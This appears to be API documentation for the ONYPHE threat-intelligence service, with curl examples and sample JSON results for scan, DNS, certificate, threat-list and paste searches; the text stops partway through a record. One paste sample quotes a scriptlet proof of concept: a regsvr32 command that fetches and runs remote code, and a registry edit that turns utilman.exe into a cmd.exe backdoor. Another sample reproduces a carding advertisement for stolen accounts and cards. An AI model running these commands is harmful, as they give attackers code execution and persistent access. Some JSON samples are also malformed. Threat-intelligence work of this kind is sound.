This method is open to use. There is need for an API key.
curl -XGET 'https://www.onyphe.io/api/myip'
{
"error": 0,
"myip": "<redacted>",
"status": "ok"
}
This method is open to use. There is need for an API key.
curl -XGET 'https://www.onyphe.io/api/geoloc/{IP}'
{
"count": 1,
"error": 0,
"myip": "<redacted>",
"results": [
{
"@category": "geoloc",
"@timestamp": "2018-10-26T12:13:01.000Z",
"@type": "doc",
"asn": "AS15133",
"city": "Norwell",
"country": "US",
"ip": "93.184.216.34",
"ipv6": "false",
"latitude": "42.1596",
"location": "42.1596,-70.8217",
"longitude": "-70.8217",
"organization": "MCI Communications Services, Inc. d/b/a Verizon Business",
"subnet": "93.184.216.0/22"
}
],
"status": "ok",
"took": "0.000",
"total": 1
}
This method requires an API key. This will return information about your user account, like the number of query credits remaining.
curl -XGET 'https://www.onyphe.io/api/user/?apikey={apikey}'
{
"count": 1,
"error": 0,
"max_page": 1,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "user",
"@timestamp": "2018-11-12T09:23:08.000Z",
"@type": "doc",
"apikey": "<redacted>",
"credits": 0,
"filters": [
"abuse",
"asn",
"city",
"count",
"country",
"data",
"datamd5",
"distinct",
"domain",
"forward",
"hostname",
"information",
"ip",
"ipv6",
"key",
[..]
"cpe",
"cve",
"device.class",
"device.product",
"device.productvendor",
"device.productversion",
"device.productversionpatch",
"tag"
],
"functions": [
"-hourago",
"-dayago",
"-weekago",
"-monthago",
"-exists"
],
"history": "7M",
"plan": "Professional Plan (non-commercial use)",
"seen_date": "2018-11-12"
}
],
"status": "ok",
"took": "0.006",
"total": 1
}
This method requires an API key. This will return a summary of all information we have for the given IPv{4,6} address. History of changes will not be shown, only latest results. Be aware that this API returns less informations than the dedicated ones. For instance, you will have more information by using the synscan or datascan APIs than by using this API for a given IP address.
curl -XGET 'https://www.onyphe.io/api/ip/{IP}?apikey={apikey}'
{
"count": 25,
"error": 0,
"myip": "<redacted>",
"results": [
{
"@category": "geoloc",
"@timestamp": "2018-10-26T12:15:33.000Z",
"@type": "doc",
"asn": "AS15133",
"city": "Norwell",
"country": "US",
"ip": "93.184.216.34",
"ipv6": "false",
"latitude": "42.1596",
"location": "42.1596,-70.8217",
"longitude": "-70.8217",
"organization": "MCI Communications Services, Inc. d/b/a Verizon Business",
"subnet": "93.184.216.0/22"
},
{
"@category": "inetnum",
"@timestamp": "2018-10-21T01:35:36.000Z",
"@type": "doc",
"country": "EU",
"information": [
"NETBLK-03-EU-93-184-216-0-24"
],
"netname": "EDGECAST-NETBLK-03",
"seen_date": "2018-10-21",
"subnet": "93.184.216.0/24"
},
{
"@category": "pastries",
"@timestamp": "2018-10-26T09:38:41.000Z",
"@type": "doc",
"key": "2WpScvHm",
"seen_date": "2018-10-26"
},
[..]
{
"@category": "synscan",
"@timestamp": "2018-10-07T23:46:40.000Z",
"@type": "doc",
"asn": "AS15133",
"city": "Norwell",
"country": "US",
"organization": "MCI Communications Services, Inc. d/b/a Verizon Business",
"os": "Unknown",
"port": "443",
"seen_date": "2018-10-07",
"subnet": "93.184.216.0/22"
},
{
"@category": "resolver",
"@timestamp": "2018-10-26T09:38:41.000Z",
"@type": "doc",
"asn": "AS15133",
"city": "Norwell",
"country": "US",
"forward": "example.com",
"organization": "MCI Communications Services, Inc. d/b/a Verizon Business",
"seen_date": "2018-10-26",
"subnet": "93.184.216.0/22"
},
[..]
{
"@category": "datascan",
"@timestamp": "2018-10-08T10:19:40.000Z",
"@type": "doc",
"asn": "AS15133",
"city": "Norwell",
"country": "US",
"data": "HTTP/1.1 404 Not Found\r\nContent-Type: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nDate: Mon, 08 Oct 2018 10:19:29 GMT\r\nServer: ECS (dca/24D5)\r\nContent-Length: 345\r\n\r\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n\t<head>\n\t\t<title>404 - Not Found</title>\n\t</head>\n\t<body>\n\t\t<h1>404 - Not Found</h1>\n\t</body>\n</html>\n",
"organization": "MCI Communications Services, Inc. d/b/a Verizon Business",
"port": "443",
"product": "ECS (dca",
"productversion": "24D5)",
"protocol": "http",
"seen_date": "2018-10-08",
"subnet": "93.184.216.0/22"
},
[..]
],
"status": "ok",
"took": "0.491",
"total": 610
}
This method requires an API key. It will return inetnum information we have for the given IPv{4,6} address with history of changes. Multiple subnets may match because of delegation mechanisms. We return all of them.
curl -XGET 'https://www.onyphe.io/api/inetnum/{IP}?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 8,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "inetnum",
"@timestamp": "2018-10-21T01:35:36.000Z",
"@type": "doc",
"country": "US",
"ipv6": "false",
"netname": "EU-EDGECASTEU-20080602",
"seen_date": "2018-10-21",
"source": "RIPE",
"subnet": "93.184.208.0/20"
},
{
"@category": "inetnum",
"@timestamp": "2018-10-21T01:35:36.000Z",
"@type": "doc",
"country": "EU",
"information": [
"NETBLK-03-EU-93-184-208-0-24"
],
"ipv6": "false",
"netname": "EDGECAST-NETBLK-03",
"seen_date": "2018-10-21",
"source": "RIPE",
"subnet": "93.184.208.0/24"
},
[..]
],
"status": "ok",
"took": "0.733",
"total": 74
}
This method requires an API key. It will return threatlist information we have for the given IPv{4,6} address with history of changes. Multiple threatlist may match. We return all of them, but only those matching and not all others.
curl -XGET 'https://www.onyphe.io/api/threatlist/{IP}?apikey={apikey}'
{
"count": 3,
"error": 0,
"max_page": 1,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "threatlist",
"@timestamp": "2018-07-24T08:35:41.000Z",
"@type": "doc",
"asn": "AS14061",
"city": "Frankfurt am Main",
"country": "DE",
"ipv6": "false",
"location": "50.1153,8.6823",
"organization": "DigitalOcean, LLC",
"seen_date": "2018-07-24",
"subnet": "206.81.18.195/32",
"tag": [
"botnet",
"mirai"
],
"threatlist": "ONYPHE - botnet/mirai"
},
[..]
],
"status": "ok",
"took": "0.015",
"total": 3
}
This method requires an API key. It will return pastries information we have for the given IPv{4,6} address with history of changes. Multiple pastries may match. We return all of them. Currently, we only return pastries collected from pastebin.com.
curl -XGET 'https://www.onyphe.io/api/pastries/{IP}?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 344,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "pastries",
"@timestamp": "2018-10-26T09:38:41.000Z",
"@type": "doc",
"content": "<?XML version=\"1.0\"?>\r\n<scriptlet>\r\n\r\n<registration\r\n description=\"Bandit\"\r\n progid=\"Bandit\"\r\n version=\"1.00\"\r\n classid=\"{AAAA1111-0000-0000-0000-0000FEEDACDC}\"\r\n\t>\r\n\t\r\n\t<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll\r\n\t<!-- DFIR -->\r\n\t<!--\t\t.sct files are downloaded and executed from a path like this -->\r\n\t<!-- Though, the name and extension are arbitary.. -->\r\n\t<!-- c:\\users\\USER\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2vcqsj3k\\file[2].sct -->\r\n\t<!-- Based on current research, no registry keys are written, since call \"uninstall\" -->\r\n\t\r\n\t\r\n\t<!-- Proof Of Concept - Casey Smith @subTee -->\r\n\t<script language=\"JScript\">\r\n\t\t<![CDATA[\r\n\t\r\n\t\t\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\");\r\n\t\r\n\t\t]]>\r\n\t</script>\r\n</registration>\r\n\r\n<public>\r\n <method name=\"Exec\"></method>\r\n</public>\r\n<script language=\"JScript\">\r\n<![CDATA[\r\n\t\r\n\tfunction Exec()\r\n\t{\r\n\t\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"reg add 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe' /t REG_SZ /v Debugger /d 'C:\\Windows\\System32\\cmd.exe' /f\");\r\n\t}\r\n\t\r\n]]>\r\n</script>\r\n\r\n</scriptlet>",
"domain": [
"example.com"
],
"file": [
"utilman.exe",
"calc.exe",
"wscript.sh",
"scrobj.dll",
"cmd.exe"
],
"ip": [
"2606:2800:220:1:248:1893:25c8:1946",
"93.184.216.34"
],
"key": "2WpScvHm",
"scheme": [
"http"
],
"seen_date": "2018-10-26",
"size": "1178",
"source": "pastebin",
"syntax": "text",
"tld": "com",
"url": [
"http://example.com/file.sct"
]
},
[..]
],
"status": "ok",
"took": "0.028",
"total": 504
}
This method requires an API key. It will return synscan information we have for the given IPv{4,6} address with history of changes. Multiple synscan entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/synscan/{IP}?apikey={apikey}'
{
"count": 3,
"error": 0,
"max_page": 2,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "synscan",
"@timestamp": "2018-10-20T12:59:57.000Z",
"@type": "doc",
"asn": "AS18779",
"city": "San Jose",
"country": "US",
"ip": "107.164.81.7",
"ipv6": "false",
"location": "37.3387,-121.8914",
"organization": "EGIHosting",
"os": "Linux",
"port": "80",
"seen_date": "2018-10-20",
"subnet": "107.164.0.0/17"
},
[..]
],
"status": "ok",
"took": "0.026",
"total": 3
}
This method requires an API key. It will return datascan information we have for the given IPv{4,6} address or string with history of changes. Multiple datascan entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/datascan/{IP,string}?apikey={apikey}'
{
"count": 2,
"error": 0,
"max_page": 1,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "datascan",
"@timestamp": "2018-10-26T10:30:15.000Z",
"@type": "doc",
"app": {
"extract": {
"domain": [
"w3.org",
"microsoft.com"
],
"hostname": [
"go.microsoft.com",
"www.w3.org"
],
"url": [
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd",
"http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409",
"http://www.w3.org/1999/xhtml"
]
},
"http": {
"bodymd5": "ac3b7fe8b6538dad865f905fa06cf19e",
"headermd5": "3a194f303abdadec442ba1646de5b2c8",
"title": "IIS7"
},
"length": "934"
},
"asn": "AS18779",
"city": "San Jose",
"country": "US",
"cpe": [
"cpe:/a:microsoft:iis:7.5"
],
"data": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nLast-Modified: Sat, 18 Aug 2018 21:54:32 GMT\r\nAccept-Ranges: bytes\r\nETag: \"f35f1b3e37d41:0\"\r\nServer: Microsoft-IIS/7.5\r\nX-Powered-By: ASP.NET\r\nDate: Fri, 26 Oct 2018 10:29:58 GMT\r\nContent-Length: 689\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\r\n<title>IIS7</title>\r\n<style type=\"text/css\">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#B3B3B3;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id=\"container\">\r\n<a href=\"http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409\"><img src=\"welcome.png\" alt=\"IIS7\" width=\"571\" height=\"411\" /></a>\r\n</div>\r\n</body>\r\n</html>",
"datamd5": "5cad586f64f2e431634331ca755e5039",
"device": {
"class": "Web Server"
},
"ip": "107.164.96.182",
"ipv6": "false",
"location": "37.3387,-121.8914",
"organization": "EGIHosting",
"os": "Windows",
"osvendor": "Microsoft",
"osversion": [
"Server 2008",
"7"
],
"port": "80",
"product": "IIS",
"productvendor": "Microsoft",
"productversion": "7.5",
"protocol": "http",
"protocolversion": "1.1",
"reason": "OK",
"seen_date": "2018-10-26",
"source": "datascan",
"status": "200",
"subnet": "107.164.0.0/17",
"tag": [
"default",
"ok"
],
"tls": "false"
},
[..]
],
"status": "ok",
"took": "0.011",
"total": 2
}
This method requires an API key. It will return reverse DNS lookup information we have for the given IPv{4,6} address with history of changes. Multiple reverse DNS entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/reverse/{IP}?apikey={apikey}'
{
"count": 1,
"error": 0,
"max_page": 1,
"myip": "<redacted>",
"page": 1,
"results": [
"results": [
{
"@category": "resolver",
"@timestamp": "2018-10-26T12:28:18.000Z",
"@type": "doc",
"asn": "AS3462",
"city": "Taipei",
"country": "TW",
"domain": "hinet.net",
"host": "211-72-19-210",
"ip": "211.72.19.210",
"ipv6": "false",
"location": "25.0478,121.5318",
"organization": "Data Communication Business Group",
"reverse": "211-72-19-210.hinet-ip.hinet.net",
"seen_date": "2018-10-26",
"source": "resolver",
"subdomains": [
"hinet-ip.hinet.net"
],
"subnet": "211.72.0.0/16",
"tld": "net",
"type": "reverse"
}
],
"status": "ok",
"took": "0.026",
"total": 1
}
This method requires an API key. It will return forward DNS lookup information we have for the given IPv{4,6} address with history of changes. Multiple forward DNS entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/forward/{IP}?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 2,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "resolver",
"@timestamp": "2018-10-22T22:27:36.000Z",
"@type": "doc",
"asn": "AS20940",
"city": "Bielefeld",
"country": "DE",
"domain": "go.com",
"forward": "cdn.abclocal.go.com",
"host": "cdn",
"ip": "2.22.52.73",
"ipv6": "false",
"location": "52.0106,8.5493",
"organization": "Akamai International B.V.",
"seen_date": "2018-10-22",
"source": "pastries",
"subdomains": [
"abclocal.go.com"
],
"subnet": "2.22.52.0/24",
"tld": "com",
"type": "forward"
},
[..]
],
"status": "ok",
"took": "0.050",
"total": 18
}
This method requires an API key. It will return information we have for the given onion domain with history of changes. Multiple onion entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/onionscan/{ONION}?apikey={apikey}'
{
"count": 2,
"error": 0,
"max_page": 1,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "onionscan",
"@timestamp": "2018-10-24T19:03:31.000Z",
"@type": "doc",
"app": {
"extract": {
"domain": [
"wikipedia.org",
"wikibooks.org",
"haskell.org",
"ats-lang.org"
],
"file": [
"grdt-popl03.pdf"
],
"hostname": [
"en.wikibooks.org",
"en.wikipedia.org",
"wiki.haskell.org",
"www.ats-lang.org"
],
"url": [
"http://www.ats-lang.org/MYDATA/GRDT-popl03.pdf",
"http://www.ats-lang.org/",
"https://en.wikibooks.org/wiki/Haskell/GADT",
"https://wiki.haskell.org/GADTs_for_dummies",
"https://en.wikipedia.org/wiki/Generalized_algebraic_data_type"
]
},
"http": {
"bodymd5": "d41d8cd98f00b204e9800998ecf8427e",
"headermd5": "297ee2062d5eab6d7a30bd8656730536",
"title": "Bluish Coder"
},
"length": "4096"
},
"cpe": [
"cpe:/a:igor_sysoev:nginx:1.10.3"
],
"data": "HTTP/1.1 200 OK\r\nContent-Length: 93915\r\nETag: \"5bc71236-16edb\"\r\nDate: Wed, 24 Oct 2018 19:03:31 GMT\r\nLast-Modified: Wed, 17 Oct 2018 10:43:02 GMT\r\nServer: nginx/1.10.3 (Ubuntu)\r\nContent-Type: text/html\r\nAccept-Ranges: bytes\r\nConnection: keep-alive\r\n\r\n\n<!DOCTYPE html>\n<html>\n<head>\n <meta http-equiv=\"content-type\" content=\"text/html; cha
[..]
"datamd5": "6f50408650910af16c5f8b229202264e",
"device": {
"class": "Web Server"
},
"domain": "mh7mkfvezts5j6yu.onion",
"hostname": "mh7mkfvezts5j6yu.onion",
"onion": "mh7mkfvezts5j6yu.onion",
"os": "Linux",
"osdistribution": "Ubuntu",
"port": 80,
"product": "Nginx",
"productvendor": "Igor Sysoev",
"productversion": "1.10.3",
"protocol": "http",
"protocolversion": "1.1",
"reason": "OK",
"seen_date": "2018-10-24",
"source": "datascan",
"status": "200",
"tag": [
"ok"
],
"tls": "false",
"url": "/"
},
[..]
],
"status": "ok",
"took": "0.004",
"total": 2
}
This method requires an API key. It will return information we have for the given IP address with history of changes. Multiple sniffer entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/sniffer/{IP}?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 3,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "sniffer",
"@timestamp": "2018-11-01T12:20:53.000Z",
"@type": "doc",
"asn": "AS20952",
"city": "London",
"country": "GB",
"data": "\\x0e\\xc2\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x00\\x00!\\x00\\x01",
"datamd5": "a5cc89fe2f131f33759daf33d1906649",
"destport": "137",
"ip": "217.138.28.194",
"ipv6": "false",
"location": "51.5085,-0.1257",
"organization": "Venus Business Communications Limited",
"seen_date": "2018-11-01",
"srcport": "137",
"subnet": "217.138.0.0/16",
"tag": [
"netbiosns",
"udpdata"
],
"transport": "udp",
"type": "udpdata"
},
[..]
],
"status": "ok",
"took": "0.049",
"total": 30
}
This method requires an API key. It will return information we have for the given domain name X509 certificate information from CTLs with history of changes. Multiple ctl entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/ctl/{DOMAIN}?apikey={apikey}'
{
"count": 1,
"error": 0,
"max_page": 1,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "ctl",
"@timestamp": "2018-11-01T12:26:52.000Z",
"@type": "doc",
"basicconstraints": [
"critical"
],
"ca": "false",
"domain": "okcpride.org",
"extkeyusage": [
"serverAuth",
"clientAuth"
],
"fingerprint": {
"md5": "52f97eff2804873fb4fd5ae479697f17",
"sha1": "78a27b289c7f5b03a4ab4627fe48cdc940d9658f",
"sha256": "9a6881c653b2a23891cdb64e3b933a624a0d7637f9a4b3ac57064baf79ec7dae"
},
"host": "www",
"hostname": [
"www.okcpride.org"
],
"ip": "184.168.131.241",
"issuer": {
"commonname": "Go Daddy Secure Certificate Authority - G2",
"country": "US",
"organization": "GoDaddy.com, Inc."
},
"keyusage": [
"critical",
"digitalSignature",
"keyEncipherment"
],
"publickey": {
"algorithm": "rsaEncryption",
"exponent": "65537",
"length": "2048"
},
"seen_date": "2018-11-01",
"serial": "c3:27:2f:1c:3f:ca:39:f5",
"signature": {
"algorithm": "sha256WithRSAEncryption"
},
"source": "Cloudflare Nimbus 2021",
"subject": {
"altname": [
"www.okcpride.org",
"okcpride.org"
],
"commonname": "okcpride.org"
},
"tld": "org",
"validity": {
"notafter": "2021-01-08T20:53:00.000Z",
"notbefore": "2018-01-08T20:53:00.000Z"
},
"version": "v3",
"wildcard": "false"
}
],
"status": "ok",
"took": "0.003",
"total": 1
}
This method requires an API key. It will return information we have for the given datamd5 filter from datascan information category with history of changes. Multiple datascan entries may match. We return all of them.
curl -XGET 'https://www.onyphe.io/api/md5/{MD5}?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 1000,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "datascan",
"@timestamp": "2018-11-01T12:49:06.000Z",
"@type": "doc",
"app": {
"length": "21"
},
"asn": "AS5429",
"country": "RU",
"cpe": [
"cpe:/a:openbsd:openssh:7.4"
],
"data": "SSH-2.0-OpenSSH_7.4\\x0d\n",
"datamd5": "7a1f20cae067b75a52bc024b83ee4667",
"device": {
"class": "SSH Server"
},
"ip": "195.178.202.164",
"ipv6": "false",
"location": "55.7386,37.6068",
"organization": "umos Center LLC",
"port": "22",
"product": "OpenSSH",
"productvendor": "OpenBSD",
"productversion": "7.4",
"protocol": "ssh",
"protocolversion": "2.0",
"seen_date": "2018-11-01",
"source": "datascan",
"subnet": "195.178.192.0/19",
"tag": [
"admin"
],
"tls": "false"
},
[..]
],
"status": "ok",
"took": "0.269",
"total": 1857911
}
This method requires an API key and a subscription to a Plan. It will return datascan information we have for the given query with history of changes. Multiple datascan entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: product:"HTTP Server" port:443 os:Windows.
curl -XGET 'https://www.onyphe.io/api/search/datascan/product:"HTTP Server"%20port:443%20os:Windows%20tls:true?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 730,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "datascan",
"@timestamp": "2018-10-26T12:13:02.000Z",
"@type": "doc",
"app": {
"extract": {
"file": [
"index.php"
]
},
"http": {
"bodymd5": "baa409832a4b9ad37d02caafe6db3e3b",
"headermd5": "8c35e8c7d3285d74e8f768c81645bec9",
"title": "ICEDD documents"
},
"length": "4096"
},
"asn": "AS5432",
"basicconstraints": "critical",
"ca": "false",
"city": "Antwerp",
"country": "BE",
"cpe": [
"cpe:/a:apache:http_server:2.4.9"
],
"data": "HTTP/1.1 200 OK\r\nDate: Fri, 26 Oct 2018 12:12:59 GMT\r\nServer: Apache/2.4.9 (Win64) PHP/5.5.12\r\nX-Powered-By: PHP/5.5.12\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nLast-Modified: Fri, 26 Oct 2018 12:12:59 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nContent-Type: text/html; charset=UTF-8\r\nSet-Cookie: AjaXplorer=nk59e3fnu5tauld6hfog1fnuj3; path=/; HttpOnly\r\nSet-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0\r\nVary: Accept-Encoding\r\nTransfer-Encoding: chunked\r\n\r\n1366\r\n<!DOCTYPE html>\n<html xmlns:ajxp>\n\t<head>\n\t\t<title>ICEDD documents</title>\n <base href=\"/\"/>\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0\">\n[..]
"datamd5": "6d24de8196dbe8177b38d035b1484fd2",
"device": {
"class": "Web Server"
},
"domain": [
"icedd.be"
],
"extkeyusage": [
"serverAuth",
"clientAuth"
],
"fingerprint": {
"md5": "749063cde72a80ae898e1a6d066d2db4",
"sha1": "b2778ff1f2febb0b13860cefd05b20a2904553bb",
"sha256": "8661dfd204dd49c67694d93daf8c2e10f07d516aa26b6ab7aff9a07865db31b5"
},
"host": [
"doc"
],
"hostname": [
"doc.icedd.be"
],
"ip": "194.78.86.221",
"ipv6": "false",
"issuer": {
"commonname": "Let's Encrypt Authority X3",
"country": "US",
"organization": "Let's Encrypt"
},
"keyusage": [
"digitalSignature",
"keyEncipherment"
],
"location": "51.2167,4.4167",
"organization": "Proximus NV",
"os": "Windows",
"osbits": "64",
"osvendor": "Microsoft",
"port": "443",
"product": "HTTP Server",
"productvendor": "Apache",
"productversion": "2.4.9",
"protocol": "http",
"protocolversion": "1.1",
"publickey": {
"algorithm": "rsaEncryption",
"length": "2048"
},
"reason": "OK",
"seen_date": "2018-10-26",
"serial": "04:5f:36:d0:14:00:4e:b1:12:db:1e:24:2d:ff:b7:f5:80:25",
"signature": {
"algorithm": "sha256WithRSAEncryption"
},
"source": "datascan",
"status": "200",
"subject": {
"altname": [
"doc.icedd.be"
],
"commonname": "doc.icedd.be"
},
"subnet": "194.78.0.0/16",
"tag": [
"ok"
],
"tld": [
"be"
],
"tls": "true",
"validity": {
"notafter": "2018-12-30T12:58:26Z",
"notbefore": "2018-10-01T12:58:26Z"
},
"version": "v3",
"wildcard": "false"
},
[..]
],
"status": "ok",
"took": "0.290",
"total": 7298
}
This method requires an API key and a subscription to a Plan. It will return synscan information we have for the given query with history of changes. Multiple synscan entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: port:23 country:FR os:Linux. Another example query could have been: ip:46.105.48.0/21 os:Linux port:23.
curl -XGET 'https://www.onyphe.io/api/search/synscan/port:23%20country:FR%20tag:mirai?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 9,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "synscan",
"@timestamp": "2018-10-26T08:00:25.000Z",
"@type": "doc",
"asn": "AS29066",
"country": "FR",
"ip": "151.106.29.38",
"ipv6": "false",
"location": "48.8582,2.3387",
"organization": "velia.net Internetdienste GmbH",
"os": "Linux",
"port": "23",
"seen_date": "2018-10-26",
"subnet": "151.106.0.0/19",
"tag": [
"botnet",
"mirai",
"worm"
]
},
[..]
],
"status": "ok",
"took": "0.096",
"total": 89
}
This method requires an API key and a subscription to a Plan. It will return inetnum information we have for the given query with history of changes. Multiple inetnum entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: organization:"OVH SAS". Another example query could have been: netname:APNIC-LABS.
curl -XGET 'https://www.onyphe.io/api/search/inetnum/organization:"OVH%20SAS"?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 1000,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "inetnum",
"@timestamp": "2018-10-21T01:35:36.000Z",
"@type": "doc",
"asn": "AS16276",
"country": "FR",
"information": [
"GPLHost UK LTD"
],
"ipv6": "false",
"location": "48.8582,2.3387",
"netname": "gplhost-paris-redbus-1",
"organization": "OVH SAS",
"seen_date": "2018-10-21",
"source": "RIPE",
"subnet": "87.98.212.192/26"
},
[..]
],
"status": "ok",
"took": "0.012",
"total": 156147
This method requires an API key and a subscription to a Plan. It will return threatlist information we have for the given query with history of changes. Multiple threatlist entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: country:RU. Another example query could have been: ip:94.253.102.185
.curl -XGET 'https://www.onyphe.io/api/search/threatlist/country:RU?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 1000,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "threatlist",
"@timestamp": "2018-10-26T12:29:35.000Z",
"@type": "doc",
"asn": "AS12389",
"city": "Khanty-Mansiysk",
"country": "RU",
"ipv6": "false",
"location": "61.0042,69.0019",
"organization": "Rostelecom",
"seen_date": "2018-10-26",
"subnet": "188.17.0.177/32",
"tag": [
"botnet",
"mirai",
"worm"
],
"threatlist": "ONYPHE - botnet/mirai"
},
[..]
],
"status": "ok",
"took": "0.009",
"total": 48473
This method requires an API key and a subscription to a Plan. It will return pastries information we have for the given query with history of changes. Multiple pastries entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: ip:195.29.70.0/24. Another example query could have been: domain:amazonaws.com.
curl -XGET 'https://www.onyphe.io/api/search/pastries/content:hacked?apikey={apikey}'
"count": 10,
"error": 0,
"max_page": 184,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "pastries",
"@timestamp": "2018-10-26T12:43:19.000Z",
"@type": "doc",
"content": "Buy Hacked PayPal, Bank Logins, Swift Bank wire transfer, WesternUnion transfer, cc topup, cvv, smtp, rdp, inbox mailer, email leads, dumps, warez, with proofs of transactions and accounts. Hello There, I'm Certified TEXAS HOUSTON carder rand hacker with 8 years of experience. I have logins with license routine number, high balance cashing out with zero theft, charge backs, and no traces securing this logs with out stipulation. I have merchant account with good balance that is convenient for buyers who are seeking for a reliable hacker to trust on with out skeptics embarking on my secured offshore server gaining full remittance either bank to bank wire transfer, wu, e trf, skrill transfer, PayPal transfer i'm specialized in the art selling hacked Hacked CreditCards details/topups and clearing of bad credit score and lot more\r\n*When you contact me I need your trust , I only work with reliable buyers. I have hack and spam to get license routine number from a well balance account running variety of transfer cashing out with zero theft and no traces or future charge back fee securing a long term business partner having your order protected down to my breathi am selling hacked e, hacked paypal accounts, bank logins, MoneyBookers, CC details/transfer, Hacked \r\n iTunes Accounts, Dumps, warez and fullz infos. I have many customers and buyers all over the world and they trust me and i promised to never break this chain till DEATH . I'm offering many offers to earn online money through sources like westernunion transfers,bank transfers,moneybookers and paypal transfers through offshore database. All transactions are offshore and anonymous and has no trace backs or chargebackshere are the Rates List with Explanation :-\r\n\r\nWestern Union Transfer :-Transferring Western Union all over the world and it takes 1hour to 12hours maximum to get MTCN and info . You Will Get MTCN Code With Sender Info + Amount And Then You Can Pick Up Funds From Any Westernunion Store. (transferring all over the world)\r\nInfo needed for WU transfers :-1: Full name2: Cell number (Not Necessary)3: City4: Country5: Valid email for sendi[..]
"key": "xsPHxYHW",
"seen_date": "2018-10-26",
"size": "5548",
"source": "pastebin",
"syntax": "text",
"title": "Dumps+pin Track1&2 WU Transfer Bug PayPal Transfer Leads VPN",
"user": "LoydBanks"
},
[..]
],
"status": "ok",
"took": "0.157",
"total": 1837
This method requires an API key and a subscription to a Plan. It will return resolver information we have for the given query with history of changes. Multiple resolver entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: ip:124.108.0.0/16.
curl -XGET 'https://www.onyphe.io/api/search/resolver/ip:124.108.0.0/16?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 1000,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "resolver",
"@timestamp": "2018-10-26T12:39:27.000Z",
"@type": "doc",
"asn": "AS9374",
"city": "Fukuyama",
"country": "JP",
"domain": "ne.jp",
"host": "hprm-15415",
"ip": "124.108.223.115",
"ipv6": "false",
"location": "34.5124,133.4056",
"organization": "EDION Corporation",
"reverse": "hprm-15415.enjoy.ne.jp",
"seen_date": "2018-10-26",
"source": "resolver",
"subdomains": [
"enjoy.ne.jp"
],
"subnet": "124.108.192.0/18",
"tld": "jp",
"type": "reverse"
},
[..]
{
"@category": "resolver",
